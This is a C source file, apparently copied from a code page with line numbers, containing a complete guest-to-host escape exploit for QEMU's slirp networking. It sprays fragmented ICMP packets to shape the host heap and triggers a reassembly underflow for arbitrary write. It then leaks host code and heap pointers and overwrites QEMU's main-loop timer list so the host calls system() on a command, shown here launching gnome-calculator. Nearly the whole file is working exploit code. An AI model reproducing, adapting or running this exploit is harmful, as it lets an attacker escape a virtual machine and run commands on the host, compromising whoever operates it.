1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656 | #include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <stdio.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <net/ethernet.h>
#include <arpa/inet.h>
#include <linux/icmp.h>
#include <linux/if_packet.h>
#include <sys/ioctl.h>
#include <net/if.h>
#include <time.h>
#define die(x) do { \
perror(x); \
exit(EXIT_FAILURE); \
}while(0);
// * * * * * * * * * * * * * * * Constans * * * * * * * * * * * * * * * * * *
#define SRC_ADDR "10.0.2.15"
#define DST_ADDR "10.0.2.2"
#define INTERFACE "ens3"
#define ETH_HDRLEN 14 // Ethernet header length
#define IP4_HDRLEN 20 // IPv4 header length
#define ICMP_HDRLEN 8 // ICMP header length for echo request, excludes data
#define MIN_MTU 12000
// * * * * * * * * * * * * * * * QEMU Symbol offset * * * * * * * * * * * * * * * * * *
#define SYSTEM_PLT 0x029b290
#define QEMU_CLOCK 0x10e8200
#define QEMU_TIMER_NOTIFY_CB 0x2f4bff
#define MAIN_LOOP_TLG 0x10e81e0
#define CPU_UPDATE_STATE 0x488190
// Some place in bss which is not used to craft fake stucts
#define FAKE_STRUCT 0xf43360
// * * * * * * * * * * * * * * * QEMU Structs * * * * * * * * * * * * * * * * * *
struct mbuf {
struct mbuf *m_next; /* Linked list of mbufs */
struct mbuf *m_prev;
struct mbuf *m_nextpkt; /* Next packet in queue/record */
struct mbuf *m_prevpkt; /* Flags aren't used in the output queue */
int m_flags; /* Misc flags */
int m_size; /* Size of mbuf, from m_dat or m_ext */
struct socket *m_so;
char * m_data; /* Current location of data */
int m_len; /* Amount of data in this mbuf, from m_data */
void *slirp;
char resolution_requested;
u_int64_t expiration_date;
char *m_ext;
/* start of dynamic buffer area, must be last element */
char * m_dat;
};
struct QEMUTimer {
int64_t expire_time; /* in nanoseconds */
void *timer_list;
void *cb;
void *opaque;
void *next;
int scale;
};
struct QEMUTimerList {
void * clock;
char active_timers_lock[0x38];
struct QEMUTimer *active_timers;
struct QEMUTimerList *le_next; /* next element */ \
struct QEMUTimerList **le_prev; /* address of previous next element */ \
void *notify_cb;
void *notify_opaque;
/* lightweight method to mark the end of timerlist's running */
size_t timers_done_ev;
};
// * * * * * * * * * * * * * * * Helpers * * * * * * * * * * * * * * * * * *
int raw_socket;
int recv_socket;
int spray_id;
int idx;
char mac[6];
void * code_leak;
void * heap_leak;
void *Malloc(size_t size) {
void * ptr = calloc(size,1);
if (!ptr) {
die("malloc() failed to allocate");
}
return ptr;
}
unsigned short in_cksum(unsigned short *ptr,int nbytes) {
register long sum; /* assumes long == 32 bits */
u_short oddbyte;
register u_short answer; /* assumes u_short == 16 bits */
/*
* Our algorithm is simple, using a 32-bit accumulator (sum),
* we add sequential 16-bit words to it, and at the end, fold back
* all the carry bits from the top 16 bits into the lower 16 bits.
*/
sum = 0;
while (nbytes > 1) {
sum += *ptr++;
nbytes -= 2;
}
/* mop up an odd byte, if necessary */
if (nbytes == 1) {
oddbyte = 0; /* make sure top half is zero */
*((u_char *) &oddbyte) = *(u_char *)ptr; /* one byte only */
sum += oddbyte;
}
/*
* Add back carry outs from top 16 bits to low 16 bits.
*/
sum = (sum >> 16) + (sum & 0xffff); /* add high-16 to low-16 */
sum += (sum >> 16); /* add carry */
answer = ~sum; /* ones-complement, then truncate to 16 bits */
return(answer);
}
void hex_dump(char *desc, void *addr, int len)
{
int i;
unsigned char buff[17];
unsigned char *pc = (unsigned char*)addr;
if (desc != NULL)
printf ("%s:\n", desc);
for (i = 0; i < len; i++) {
if ((i % 16) == 0) {
if (i != 0)
printf(" %s\n", buff);
printf(" %04x ", i);
}
printf(" %02x", pc[i]);
if ((pc[i] < 0x20) || (pc[i] > 0x7e)) {
buff[i % 16] = '.';
} else {
buff[i % 16] = pc[i];
}
buff[(i % 16) + 1] = '\0';
}
while ((i % 16) != 0) {
printf(" ");
i++;
}
printf(" %s\n", buff);
}
char * ethernet_header(char * eth_hdr){
/* src MAC : 52:54:00:12:34:56 */
memcpy(ð_hdr[6],mac,6);
// Next is ethernet type code (ETH_P_IP for IPv4).
// http://www.iana.org/assignments/ethernet-numbers
eth_hdr[12] = ETH_P_IP / 256;
eth_hdr[13] = ETH_P_IP % 256;
return eth_hdr;
}
void ip_header(struct iphdr * ip ,u_int32_t src_addr,u_int32_t dst_addr,u_int16_t payload_len,
u_int8_t protocol,u_int16_t id,uint16_t frag_off){
/* rfc791 */
ip->ihl = IP4_HDRLEN / sizeof (uint32_t);
ip->version = 4;
ip->tos = 0x0;
ip->tot_len = htons(IP4_HDRLEN + payload_len);
ip->id = htons(id);
ip->ttl = 64;
ip->frag_off = htons(frag_off);
ip->protocol = protocol;
ip->saddr = src_addr;
ip->daddr = dst_addr;
ip->check = in_cksum((unsigned short *)ip,IP4_HDRLEN);
}
void icmp_header(struct icmphdr *icmp, char *data, size_t size) {
/* rfc792 */
icmp->type = ICMP_ECHO;
icmp->code = 0;
icmp->un.echo.id = htons(0);
icmp->un.echo.sequence = htons(0);
if (data) {
char * payload = (char * )icmp+ ICMP_HDRLEN;
memcpy(payload, data, size);
}
icmp->checksum = in_cksum((unsigned short *)icmp, ICMP_HDRLEN + size);
}
void send_pkt(char *frame, u_int32_t frame_length) {
struct sockaddr_ll sock;
sock.sll_family = AF_PACKET;
sock.sll_ifindex = idx;
sock.sll_halen = 6;
memcpy (sock.sll_addr, mac, 6 * sizeof (uint8_t));
if(sendto(raw_socket,frame,frame_length,0x0,(struct sockaddr *)&sock,
sizeof(sock))<0)
die("sendto()");
}
void send_ip4(uint32_t id,u_int32_t size,char * data,u_int16_t frag_off) {
u_int32_t src_addr, dst_addr;
src_addr = inet_addr(SRC_ADDR);
dst_addr = inet_addr(DST_ADDR);
char * pkt = Malloc(IP_MAXPACKET);
struct iphdr * ip = (struct iphdr * ) (pkt + ETH_HDRLEN);
ethernet_header(pkt);
u_int16_t payload_len = size;
ip_header(ip,src_addr,dst_addr,payload_len,IPPROTO_ICMP,id,frag_off);
if(data) {
char * payload = (char *)pkt + ETH_HDRLEN + IP4_HDRLEN;
memcpy(payload, data, payload_len);
}
u_int32_t frame_length = ETH_HDRLEN + IP4_HDRLEN + payload_len;
send_pkt(pkt,frame_length);
free(pkt);
}
void send_icmp(uint32_t id,u_int32_t size,char * data,u_int16_t frag_off) {
char * pkt = Malloc(IP_MAXPACKET);
struct icmphdr * icmp = (struct icmphdr * )(pkt);
if(!data)
data = Malloc(size);
icmp_header(icmp,data,size);
u_int32_t len = ICMP_HDRLEN + size;
send_ip4(id,len,pkt,frag_off);
free(pkt);
}
// * * * * * * * * * * * * * * * * * Main * * * * * * * * * * * * * * * * * *
void initialize() {
int sd;
struct ifreq ifr;
char interface[40];
int mtu;
srand(time(NULL));
strcpy (interface, INTERFACE);
// Submit request for a socket descriptor to look up interface.
if ((sd = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
die("socket() failed to get socket descriptor for using ioctl()");
}
// Use ioctl() to get interface maximum transmission unit (MTU).
memset (&ifr, 0, sizeof (ifr));
strcpy (ifr.ifr_name, interface);
if (ioctl (sd, SIOCGIFMTU, &ifr) < 0) {
die("ioctl() failed to get MTU ");
}
mtu = ifr.ifr_mtu;
printf ("MTU of interface %s : %i\n", interface, mtu);
if (mtu < MIN_MTU) {
printf("Run\n$ ip link set dev %s mtu 12000\n",interface);
die("");
}
// Use ioctl() to look up interface name and get its MAC address.
memset (&ifr, 0, sizeof (ifr));
snprintf (ifr.ifr_name, sizeof (ifr.ifr_name), "%s", interface);
if (ioctl (sd, SIOCGIFHWADDR, &ifr) < 0) {
die("ioctl() failed to get source MAC address ");
}
memcpy (mac, ifr.ifr_hwaddr.sa_data, 6 * sizeof (uint8_t));
printf ("MAC %s :", interface);
for (int i=0; i<5; i++) {
printf ("%02x:", mac[i]);
}
printf ("%02x\n", mac[5]);
// Use ioctl() to look up interface index which we will use to
// bind socket descriptor sd to specified interface with setsockopt() since
// none of the other arguments of sendto() specify which interface to use.
memset (&ifr, 0, sizeof (ifr));
snprintf (ifr.ifr_name, sizeof (ifr.ifr_name), "%s", interface);
if (ioctl (sd, SIOCGIFINDEX, &ifr) < 0) {
die("ioctl() failed to find interface ");
}
close (sd);
printf ("Index for interface %s : %i\n", interface, ifr.ifr_ifindex);
idx = ifr.ifr_ifindex;
if((raw_socket = socket(PF_PACKET, SOCK_RAW, htons (ETH_P_ALL)))==-1)
die("socket() failed to obtain raw socket");
/* Bind socket to interface index. */
if (setsockopt (raw_socket, SOL_SOCKET, SO_BINDTODEVICE, &ifr, sizeof (ifr)) < 0) {
die("setsockopt() failed to bind to interface ");
}
printf("Initialized socket discriptors\n");
}
void spray(uint32_t size, u_int32_t count) {
printf("Spraying 0x%x x ICMP[0x%x]\n",count,size);
int s;
u_int16_t frag_off;
char * data;
for (int i = 0; i < count; i++) {
send_icmp(spray_id + i,size, NULL, IP_MF);
}
}
void arbitrary_write(void *addr, size_t addrlen, char *payload, size_t size,
size_t spray_count) {
spray(0x8, spray_count);
size_t id = spray_id + spray_count;
// Target
size_t target_id = id++;
send_ip4(target_id, 0x8, NULL, IP_MF);
// Padding
send_ip4(id++, 0x8, NULL, IP_MF);
send_ip4(id++, 0x8, NULL, IP_MF);
// Piviot Point
size_t hole_1 = id++;
send_ip4(hole_1, 0x8, NULL, IP_MF);
// Padding
send_ip4(id++, 0xC30, NULL, IP_MF);
// For creating hole
size_t hole_2 = id++;
send_ip4(hole_2, 0x8, NULL, IP_MF);
// To prevent consolidation
send_ip4(id++, 0x8, NULL, IP_MF);
// This should create the fist hole
send_ip4(hole_1, 0x8, NULL, 0x1);
// This should create the second hole
send_ip4(hole_2, 0x8, NULL, 0x1);
int m_data_off = -0x70;
int m_len = m_data_off;
addr = (void *)((size_t)addr + ((m_len * -1) - addrlen));
if (addrlen != 0x8) {
m_len -= (0x8 - addrlen);
}
size_t vuln_id = id++;
char * pkt = Malloc(IP_MAXPACKET);
memset(pkt,0x0,IP_MAXPACKET);
struct iphdr * ip = (struct iphdr * ) (pkt + ETH_HDRLEN);
ethernet_header(pkt);
u_int16_t pkt_len = 0xc90;
ip_header(ip,m_len,0x0,pkt_len,IPPROTO_ICMP,vuln_id,IP_MF);
u_int32_t frame_length = ETH_HDRLEN + IP4_HDRLEN + pkt_len;
// The mbuf of this packet will be placed in the second hole and
// m_ext buff will be placed on the first hole, We will write wrt
// to this.
send_pkt(pkt,frame_length);
memset(pkt,0x0,IP_MAXPACKET);
ip = (struct iphdr * ) (pkt + ETH_HDRLEN);
ethernet_header(pkt);
pkt_len = 0x8;
ip_header(ip,m_len,0x0,pkt_len,IPPROTO_ICMP,vuln_id,0x192);
frame_length = ETH_HDRLEN + IP4_HDRLEN + pkt_len;
// Trigger the bug to change target's m_len
send_pkt(pkt,frame_length);
// Underflow and write, to change m_data
char addr_buf[0x8] = {0};
if (addrlen != 0x8) {
memcpy(&addr_buf[(0x8-addrlen)],(char *)&addr,addrlen);
} else {
memcpy(addr_buf,(char *)&addr,8);
}
send_ip4(target_id, 0x8, addr_buf, 0x1|IP_MF);
send_ip4(target_id, size, payload, 0x2);
hex_dump("Writing Payload ", payload, size);
}
void recv_leaks(){
/* Prepare recv sd */
/* Submit request for a raw socket descriptor to receive packets. */
int recvsd, fromlen, bytes, status;
struct sockaddr from;
char recv_ether_frame[IP_MAXPACKET];
struct iphdr *recv_iphdr = (struct iphdr *)(recv_ether_frame + ETH_HDRLEN);
struct icmphdr *recv_icmphdr =
(struct icmphdr *)(recv_ether_frame + ETH_HDRLEN + IP4_HDRLEN);
for (;;) {
memset(recv_ether_frame, 0, IP_MAXPACKET * sizeof(uint8_t));
memset(&from, 0, sizeof(from));
fromlen = sizeof(from);
if ((bytes = recvfrom(recv_socket, recv_ether_frame, IP_MAXPACKET, 0,
(struct sockaddr *)&from, (socklen_t *)&fromlen)) <
0) {
status = errno;
// Deal with error conditions first.
if (status == EAGAIN) { // EAGAIN = 11
printf("Time out\n");
} else if (status == EINTR) { // EINTR = 4
continue; // Something weird happened, but let's keep listening.
} else {
perror("recvfrom() failed ");
exit(EXIT_FAILURE);
}
} // End of error handling conditionals.
// Check for an IP ethernet frame, carrying ICMP echo reply. If not, ignore
// and keep listening.
if ((((recv_ether_frame[12] << 8) + recv_ether_frame[13]) == ETH_P_IP) &&
(recv_iphdr->protocol == IPPROTO_ICMP) &&
(recv_icmphdr->type == ICMP_ECHOREPLY) && (recv_icmphdr->code == 0) &&
(recv_icmphdr->checksum == 0xffff)) {
hex_dump("Recieved ICMP Replay : ", recv_ether_frame, bytes);
code_leak = (void *)(*((size_t *)&recv_ether_frame[0x40]) - CPU_UPDATE_STATE);
size_t *ptr = (size_t *)(recv_ether_frame + 0x30);
for (int i = 0; i < (bytes / 0x8); i++) {
if ((ptr[i] & 0x7f0000000000) == 0x7f0000000000) {
heap_leak = (void *)(ptr[i] & 0xffffff000000);
break;
}
}
printf("Host Code Leak : %p\n", code_leak);
printf("Host Heap Leak : %p\n", heap_leak);
break;
}
}
}
void leak() {
u_int32_t src_addr, dst_addr;
src_addr = inet_addr(SRC_ADDR);
dst_addr = inet_addr(DST_ADDR);
/* Crafting Fake ICMP Packet For Leak */
char * pkt = Malloc(IP_MAXPACKET);
struct iphdr * ip = (struct iphdr * ) (pkt + ETH_HDRLEN);
struct icmphdr * icmp = (struct icmphdr * )(pkt+ETH_HDRLEN+IP4_HDRLEN);
ethernet_header(pkt);
ip_header(ip,src_addr,dst_addr,ICMP_HDRLEN,IPPROTO_ICMP,0xbabe,IP_MF);
ip->tot_len = ntohs(ip->tot_len) - IP4_HDRLEN;
ip->id = ntohs(ip->id);
ip->frag_off = htons(ip->frag_off);
icmp_header(icmp,NULL,0x0);
char * data = (char *)icmp + ICMP_HDRLEN + 8;
size_t pkt_len = ETH_HDRLEN + IP4_HDRLEN + ICMP_HDRLEN;
spray_id = rand() & 0xffff;
arbitrary_write((void * )(0xb00-0x20),3,pkt,pkt_len+4,0x100);
// This is same as the arbitrary write function
spray_id = rand() & 0xffff;
spray(0x8, 0x20);
size_t id = spray_id + 0x20;
size_t replay_id = id++;
send_ip4(replay_id, 0x100, NULL, IP_MF);
// Target
size_t target_id = id++;
send_ip4(target_id, 0x8, NULL, IP_MF);
// Padding
send_ip4(id++, 0x8, NULL, IP_MF);
send_ip4(id++, 0x8, NULL, IP_MF);
// Piviot Point
size_t hole_1 = id++;
send_ip4(hole_1, 0x8, NULL, IP_MF);
// Padding
send_ip4(id++, 0xC30, NULL, IP_MF);
// For creating hole
size_t hole_2 = id++;
send_ip4(hole_2, 0x8, NULL, IP_MF);
// Prevent Consolidation
send_ip4(id++, 0x8, NULL, IP_MF);
// This should create the fist hole
send_ip4(hole_1, 0x8, NULL, 0x1);
// This should create the second hole
send_ip4(hole_2, 0x8, NULL, 0x1);
// Trigger the bug to change target's m_len
int m_data_off = -0xd50;
int m_len = m_data_off;
size_t * addr = (size_t * )(0xb00 - 0x20 + ETH_HDRLEN + 0xe + 6) ;
size_t addrlen = 0x3;
if (addrlen != 0x8) {
m_len -= (0x8 - addrlen);
}
size_t vuln_id = id++;
memset(pkt,0x0,IP_MAXPACKET);
ip = (struct iphdr * ) (pkt + ETH_HDRLEN);
ethernet_header(pkt);
pkt_len = 0xc90;
ip_header(ip,m_len,0x0,pkt_len,IPPROTO_ICMP,vuln_id,IP_MF);
u_int32_t frame_length = ETH_HDRLEN + IP4_HDRLEN + pkt_len;
send_pkt(pkt,frame_length);
memset(pkt,0x0,IP_MAXPACKET);
ip = (struct iphdr * ) (pkt + ETH_HDRLEN);
ethernet_header(pkt);
pkt_len = 0x8;
ip_header(ip,m_len,0x0,pkt_len,IPPROTO_ICMP,vuln_id,0x192);
frame_length = ETH_HDRLEN + IP4_HDRLEN + pkt_len;
send_pkt(pkt,frame_length);
// Underflow and write to change m_data
char addr_buf[0x8] = {0};
if (addrlen != 0x8) {
memcpy(&addr_buf[(0x8-addrlen)],(char *)&addr,addrlen);
} else {
memcpy(addr_buf,(char *)&addr,8);
}
send_ip4(target_id, 0x8, addr_buf, 0x1);
if ((recv_socket = socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL))) < 0)
die("socket() failed to obtain a receive socket descriptor");
send_ip4(replay_id, 0x8, NULL, 0x20);
recv_leaks();
char zero[0x28] = {0};
spray_id = rand() & 0xffff;
printf("Cleaning Heap\n");
arbitrary_write(heap_leak + (0xb00 - 0x20),3,zero,sizeof(zero),0x20);
}
void pwn() {
char payload[0x200] = {0};
struct QEMUTimerList *tl = (struct QEMUTimerList *)payload;
struct QEMUTimer *ts =
(struct QEMUTimer *)(payload + sizeof(struct QEMUTimerList));
char cmd[] = "/usr/bin/gnome-calculator";
memcpy((void *)(payload + sizeof(struct QEMUTimerList ) \
+sizeof(struct QEMUTimer )), \
(void *)cmd,sizeof(cmd));
void * fake_timer_list = code_leak + FAKE_STRUCT;
void * fake_timer = fake_timer_list + sizeof(struct QEMUTimerList);
void *system = code_leak + SYSTEM_PLT;
void *cmd_addr = fake_timer + sizeof(struct QEMUTimer);
/* Fake Timer List */
tl->clock = (void *)(code_leak + QEMU_CLOCK);
*(size_t *)&tl->active_timers_lock[0x30] = 0x0000000100000000;
tl->active_timers = fake_timer;
tl->le_next = 0x0;
tl->le_prev = 0x0;
tl->notify_cb = code_leak + QEMU_TIMER_NOTIFY_CB;
tl->notify_opaque = 0x0;
tl->timers_done_ev = 0x0000000100000000;
/*Fake Timer structure*/
ts->timer_list = fake_timer_list;
ts->cb = system;
ts->opaque = cmd_addr;
ts->scale = 1000000;
ts->expire_time = -1;
spray_id = rand() & 0xffff;
size_t payload_size =
sizeof(struct QEMUTimerList) + sizeof(struct QEMUTimerList) + sizeof(cmd);
printf("Writing fake structure : %p\n",fake_timer_list);
arbitrary_write(fake_timer_list,8,payload,payload_size,0x20);
spray_id = rand() & 0xffff;
void * main_loop_tlg = code_leak + MAIN_LOOP_TLG;
printf("Overwriting main_loop_tlg %p\n",main_loop_tlg);
arbitrary_write(main_loop_tlg,8,(char *)&fake_timer_list,8,0x20);
}
int main() {
initialize();
leak();
pwn();
return 0;
}
|
